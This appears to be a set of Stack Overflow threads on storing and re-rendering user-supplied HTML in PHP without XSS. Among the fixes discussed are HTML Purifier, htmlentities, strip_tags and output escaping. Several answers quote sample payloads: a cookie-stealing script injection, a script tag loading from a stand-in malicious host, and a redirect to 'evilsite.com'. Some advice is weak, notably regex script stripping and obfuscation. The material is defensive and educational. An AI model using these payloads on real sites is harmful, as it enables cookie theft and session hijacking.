How to store user content while avoiding XSS vulnerabilities - php

I know similar questions have been asked but I am struggling to work out how to do it.
I am building a CMS, rather primitive right now, but it's as a learning exercise; in a production site, I would use an existing solution for sure.
I would like to take user input, which can be styled in a WYSIWYG editor. I would also like them to be able to insert images inline.
I understand I can store HTML in the database but how can I safely re-render this. I know there is no problem with the HTML being stored but it is my understanding that XSS become an issue if I were to just simply dump the user-generated code onto a layout template.
So the question put simply, is how can I store and safely rerender user content in cms? I am using Laravel and PHP. I also have a little knowledge of javascript if its required.

For a CMS where you want to allow some tags but not others, then you want something like HTML Purifier. This will take HTML and run it against a whitelist and regenerate HTML that is safe to display back to the user.

A good and cheap way to avoid cross-site scripting is to get your php program to entitize everything from your users' input before storing it in the database. That is, you want to take this entry from a user
Hi there sucker! I just hacked your site.
<script>alert('You have been pwned!')</script>
and convert it to this before putting it into your database.
Hi there sucker! I just hacked your site.
<script>alert('You have been pwned!')</script>
When you pass < to a browser, it renders it as <, but it doesn't do anything else with it.
The htmlentities() function can do this for you. And, php's htmlspecialchars_decode() can reverse it if you need to. But you shouldn't reverse the operation unless you absolutely must do so, for example to load the document into an embedded editor for changes.
You can also choose to entitize user-furnished text after you retrieve it from your database and before you display it. If you get to the point where several people work on your code, you may want to do both for safety.
You can also render user-provided input inside <pre>content</pre> tags, which tells the brower to just render the text and do nothing else with it.
(Use right-click Inspect on this very page to see how Stack Overflow handles my malicious example.)

Related

OWASP Cross Site Scripting rules?

I'm reading about XSS to educate myself on security while working with PHP. I'm referring to this article, in which they talk about XSS and some of the rules that should be adhered to.
Could someone explain Rules #0 and #1 for me? I understand some of what they are saving, but when they say untrusted data do they mean data entered by the user?
I'm working on some forms and I'm trying to adhere to these rules to prevent XSS. The thing is, I never output anything to the user once the form is complete. All I do is process data and save it to text files. I've done some client-side and a lot of server-side validation, but I can't figure out what they mean by never insert untrusted data except in allowed locations.
By escaping do they mean closing tags - </>?
Rule #0 means that you should not output data in locations of your webpage, where it's expected to run instructions.
As shown on your url, do not put user generated data inside <script>tags. For example, this is a no-no:
<script>
var usernameSpanTag = document.getElementById('username');
usernameSpanTag.innerText = "Welcome back, "+<?=$username?>+"!";
</script>
Looks pretty safe, right? Well, what if your $username variable contains the following values:
""; console.log(document.cookie);//
So, on a website what you're going to display is going to be this:
<script>
var usernameSpanTag = document.getElementById('username');
usernameSpanTag.innerText = "Welcome back, "+""; console.log(document.cookie);//+"!";
</script>
So someone can easily steal your user's cookies and elevate their privileges. Now imagine that you're using similar code to say, update which user created the latest post, and shows up via AJAX. That's a disaster waiting to happen if you do something like above (and do not sanitize the username in the first place).
Same applies for <style>,<img>, <embed>, <iframe> or any other tag that lets you run scripts or import resources. Also applies to comments. Browsers ignore comments, but some interpreters like the JSP parser handles HTML comments as template text. It doesn't ignore its contents.
Rule #1 is pretty similar tu rule #0, if you're developing web applications at some point or another you will have to output user generated data, whether it is an email address, a username, a name, or whatever.
If you're developing a forum, probably you may want to give your users some styling options for their text. Basic stuff like bold letters, underlined and italics should suffice. If you want to get fancy, you may even let your users change the font.
An easy way to do it, without too many complications, is just letting users write their own HTML if they choose to do so, so if you output HTML from your users in "safe" locations like between <p> tags, then that's a disaster waiting to happen as well.
Because I can write:
Hey everybody, this is my first post <script src="//malicioussite.io/hackingYoCookiez.js"></script>!
If you don't escape that input, people will only see:
Hey everybody, this is my first post`!
but your browser will also see an external javascript that tells it to send everybody's cookies to a remote location.
So always escape the data. If you're using PHP you can use htmlentities or use a template engine like Twig, that automatically escapes the output for you.

PHP - Plugin or library for whitelisting certain HTML tags

I am running a blog which other visitors can post on. I want to allow certain HTML tags like headers, linebreaks or links. What is a good or best piece of plugin software I can use for this?
Additionally, is it best practise to save the raw data and then whitelist it when it is time for display in the blog. Or shall I whitelist the data before saving it to the database, so that it is saved clean?
The built in function strip_tags already has whitelist functionality that works quite nicely.
As for storage, it's a judgment call, but I recommend storing everything in its raw state and encoding for display only. It's only a concern if you think you may accidentally forget to strip/encode on display.

PHP databases - don't want to show javascript code

I have problem with PHP and JavaScript/CSS.
I have database with table. The table has a descriptions of articles. I want to echo the descriptions of the articles from database. Unfortunately many of them has a JavaScript or CSS included ( Then some article text), so when I use echo, it shows all of that code (and after that text). Is there any way to not show the JavaScript/CSS part and show only the text? For example with str_replace and regular expression? If yes, can somebody write me how it should look like?
Thanks for help and let me know if u need more info (code etc.)
Use HTMLPurifier - it will remove the scripts, css and any harmfull content from your articles. Since it is a CPU-intensive operations, it's better to run article trough HTMLPurifer before saving in the database, then to run it each time you are showing the article.
If you're trying to remove tags from a user's post, you can call strip_tags. This will get rid of css links, script tags, etc. It will not get rid of the style attribute, but if you get rid of div, span, p, etc. that won't matter -- there will be no tag for it to reside on.
As has been stated by others, it is generally best to sanitize your input (data from user before it goes into the DB), than it is to sanitize your output.
If you're trying to simply hide the JS and CSS from users, you can use Packer to obfusicate Javascript from less-savvy users, use Packer and use base 62 encoding. The JS will still work but will look like jiberish. Be aware that more knowledgeable users can attempt to unobfusicate the code, so any critical security risks in the JS still exists. Don't think any JS that accesses your databases directly will be safe; instead remove database access from the Javascript for security. If the JS is just to do fancy things like move elements around the page it's probably fine to just obfuscate it.
Only consider this if YOU have complete control and awareness of all JS included with the articles. If this is something your anonmous or otherwise not 120% trusted users can upload, you need to kill that functionality and use HTML Purifier to remove any JS they might add. It is not safe to output user entered JS, for you or your users.
For the CSS, I'm not sure why you want to hide it, and CSS can't be obfuscated quite like JS can; the styles will still be in plain English, best you can do is butcher the class/id names and whitespace; outputting CSS that YOU generated isn't a real security risk though, and even if people reverse engineer it I wouldn't be that afraid.
Again, if this is something anonymous/non trusted users can ADD to your site on their own, you don't want this at all, so remove the ability to upload CSS with an article using the HTML Purifier Darhazer mentioned.
You can try the following regex to remove the script and css:
"<script[\d\D]*?>[\d\D]*?</script>"
"<style[\d\D]*?>[\d\D]*?</style>"
It should help, but it cannot remove all the scripts. Like onclick="javascript:alert(1)".

Write links in a natural and optimized way using JavaScript and/or PHP

The admin users of a module that I'm developing want to add a functionality of automatically write links in the textarea(s) they fill.
For example, if they write:
Please visit our page http://page.com
They want that http://page.com automatically is converted in a link:
http://page.com
I want to do this in the best possible way in order of usability and performance.
I can't change the type of field (textarea) but I can do modifications with PHP and JavaScript that always is active (No Frameworks).
The users frequently edit the fields and the links are only important when they "publish" the forms, because the content of those textarea(s) are displayed inside an HTML table.
A textarea input could have more than one link.
I appreciate your opinions and points of view to resolve this common situation.
In my opinion, you should handle this situation:
using PHP,
after reading the textarea contents from DB where it was stored,
before sending the HTML output
I don't know the details of your application context and its users, but when you output any user input as HTML, you must take care of security issues as XSS attacks, and others.
If $textarea_contents is the variable where the textarea contents are (read from the DB), I would apply the htmlspecialchars function first:
$output = htmlspecialchars( $textarea_contents );
After this, you can parse the output string or use a regular expression to transform the URLs in anchor elements. You choice depends on the level of precision you want. A couple of choices are:
http://code.iamcal.com/php/lib_autolink/lib_autolink.phps
http://jmrware.com/articles/2010/linkifyurl/linkify.html
And it is good to know this recommended reading about the complex problem of linkifying strings (from the creator of Stack Overflow website):
http://www.codinghorror.com/blog/2008/10/the-problem-with-urls.html
Good luck!
$code = preg_replace('/((https?|ftp):\/\/(?:[A-Z0-9-]+.)+[A-Z]{2,6}([\/?].+)?)/i','$1',$code);
(Regex Source)
This RegEx is better since take care of the parameters passed in the URL and finish when the URL finish and don't take spaces or other following words.
(https?|ftp)://([-A-Z0-9.]+)(/[-A-Z0-9+&##/%=~_|!:,.;]*)?(\?[A-Z0-9+&##/%=~_|!:,.;]*)?
Any other suggestion to face up this situation? Use JavaScript or PHP? Any idea?

Is it ok not to clean user input in this situation (PHP/MySQL)?

I always run user supplied input through both the html entities and mysql real escape string functions.
But now I am building a CMS which has a WYSIWYG editor in the admin section. I noticed that using htmlentities() on the WYSIWYG edited user content removed all styles and throws a bunch of quotes on the front end article page (as can be expected).
So is it ok to not clean the html/javascripts entered by the user in this situation? I will still use mysql_real_escape_string() which doesn't conflict.
Although the admin in the only one who will have access to the back end, I can think of at least one scenario where suppose a hacker somehow got access to the create a post page, now although they can wreak havoc by deleting posts, etc, instead they choose to use this as an opportunity to send visitors to his site by making this post:
<script>window.location = "http://evilsite.com"</script>
So what should I do? and also are there any functions that will disable javascript but not html and inline css?
The WYSWYG is TinyMCE by the way.
It is never OK to not clean user input. Anybody can sabotage your system, just like you hypothesized. This kind of risk is simply not worth taking.
Although, for your case it would depend on the WYSIWYG editor you use. Look around TinyMCE's documentation or ask around, and see what it says about displaying/rendering HTML output in its rich text editor with regards to XSS vulnerabilities.

Categories